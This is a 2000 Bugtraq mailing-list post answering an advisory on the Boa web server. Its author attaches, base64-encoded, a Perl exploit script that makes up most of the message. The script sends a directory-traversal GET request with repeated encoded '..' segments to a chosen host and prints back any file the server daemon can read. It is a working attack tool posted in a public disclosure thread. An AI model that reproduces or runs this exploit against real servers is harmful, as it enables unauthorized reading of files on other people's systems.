[17101] in bugtraq
Re: Vulnerability in BOA web server v0.94.8.2
daemon@ATHENA.MIT.EDU (teleh0r -)
Sun Oct 8 16:37:00 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="383875897.970934172050.JavaMail.root@web597-mc"
Message-Id: <383874754.970934172071.JavaMail.root@web597-mc>
Date: Sat, 7 Oct 2000 11:56:12 -0400
Reply-To: teleh0r - <teleh0r@DOGLOVER.COM>
From: teleh0r - <teleh0r@DOGLOVER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
--383875897.970934172050.JavaMail.root@web597-mc
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
After having read the "Vulnerability in BOA web server v0.94.8.2"
advisory by llmora, I wrote a simple exploit for the vulnerability.
It is tested on Boa version 0.94.7 which I believe is distributed
with Debian.
(http://www.s21sec.com/en/avisos/s21sec-005-en.txt) Entire advisory
Sincerely yours,
teleh0r
______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup
--383875897.970934172050.JavaMail.root@web597-mc
Content-Type: application/x-perl; name=boa-httpd-exploit.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=boa-httpd-exploit.pl
Content-Description:
Content-ID:
IyEvdXNyL2Jpbi9wZXJsIC13CgojIyBCb2EgV2ViIFNlcnZlciBEYWVtb24gRXhwbG9pdCAvIEZv
dW5kIGJ5IExsdWlzIE1vcmEgCiMjCiMjIEV4cGxvaXQgd3JpdHRlbiBieSB0ZWxlaDByIGJhc2Vk
IG9uIGFuIGFkdmlzb3J5IAojIyBieSBMbHVpcyBNb3JhIC8gbGxtb3JhQHMyMXNlYy5jb20gLyBT
MjFTRUMKIyMgKGh0dHA6Ly93d3cuczIxc2VjLmNvbS9lbi9hdmlzb3MvczIxc2VjLTAwNS1lbi50
eHQpCiMjCiMjIFRoaXMgZXhwbG9pdCB3aWxsIHNob3cgdGhlIGNvbnRlbnQgb2YgYW55IGZpbGUK
IyMgd2hpY2ggaXMgcmVhZGFibGUgYnkgdGhlIGJvYSBodHRwIGRhZW1vbi4gU2hvdWxkCiMjIHdv
cmsgb24gQm9hIFdlYiBTZXJ2ZXJzIGJlbG93IHZlcnNpb24gdjAuOTQuOC4zCiMjIGJ1dCBvbmx5
IHRpbCB2MC45Mi54IChTZWUgYWR2aXNvcnkgZm9yIGRldGFpbHMpICAKIyMKIyMgaHR0cDovL3Rl
bGVoMHIuY2piLm5ldC8gfHwgdGVsZWgwckBkb2dsb3Zlci5jb20KCnVzZSBTb2NrZXQ7IHVzZSBz
dHJpY3Q7CgppZiAoQEFSR1YgPCAyKSB7CiAgICBwcmludCgiVXNhZ2U6ICQwIDxob3N0PiA8Zmls
ZT5cbiIpOwogICAgZXhpdCgxKTsKfQoKbXkgKCRob3N0LCAkZmlsZSwgJHVybF9lbmNvZGVkLCAk
ZXhwbG9pdF9zdHJpbmcsCiAgICAkaWFkZHIsICRwYWRkciwgJHByb3RvLCAkcmVzcG9uc2UpOwoK
KCRob3N0LCAkZmlsZSkgPSBAQVJHVjsKCiRmaWxlID1+IHMvKFx3KS9zcHJpbnRmKCIlJSV4Iixv
cmQoJDEpKS9nZTsKCiMgTWFrZSB0aGUgYmVsb3cgc3RyaW5nIGxvbmcgdG8gYmUgb24gdGhlIHNh
ZmUgc2lkZSEKIyAoIi8lMkUlMkUvIiBlcSAiLy4uLyIgKFVSTC1lbmNvZGVkLikpOyA7KQoKJHVy
bF9lbmNvZGVkID0gIi8lMkUlMkUvIngiMTUiOwokZXhwbG9pdF9zdHJpbmcgPSAiR0VUICR1cmxf
ZW5jb2RlZCRmaWxlIEhUVFAvMS4wXDAxNVwwMTIiOwoKJGlhZGRyID0gaW5ldF9hdG9uKCRob3N0
KSAgICAgICAgICAgICAgICAgICAgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHIgPSBzb2Nr
YWRkcl9pbig4MCwgJGlhZGRyKSAgICAgICAgICAgICB8fCBkaWUoIkVycm9yOiAkIVxuIik7CiRw
cm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSAgICAgICAgICAgICAgIHx8IGRpZSgiRXJyb3I6
ICQhXG4iKTsKCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8
IGRpZSgiRXJyb3I6ICQhXG4iKTsKY29ubmVjdChTT0NLRVQsICRwYWRkcikgICAgICAgICAgICAg
ICAgICAgICAgfHwgZGllKCJFcnJvcjogJCFcbiIpOwpzZW5kKFNPQ0tFVCwiJGV4cGxvaXRfc3Ry
aW5nXDAxNVwwMTIiLCAwKSAgICB8fCBkaWUoIkVycm9yOiAkIVxuIik7Cgp3aGlsZSAoZGVmaW5l
ZCgkcmVzcG9uc2UgPSA8U09DS0VUPikpIHsKICAgIHByaW50KCIkcmVzcG9uc2UiKTsKfQpjbG9z
ZShTT0NLRVQpOyBleGl0KDEpOwo=
--383875897.970934172050.JavaMail.root@web597-mc--
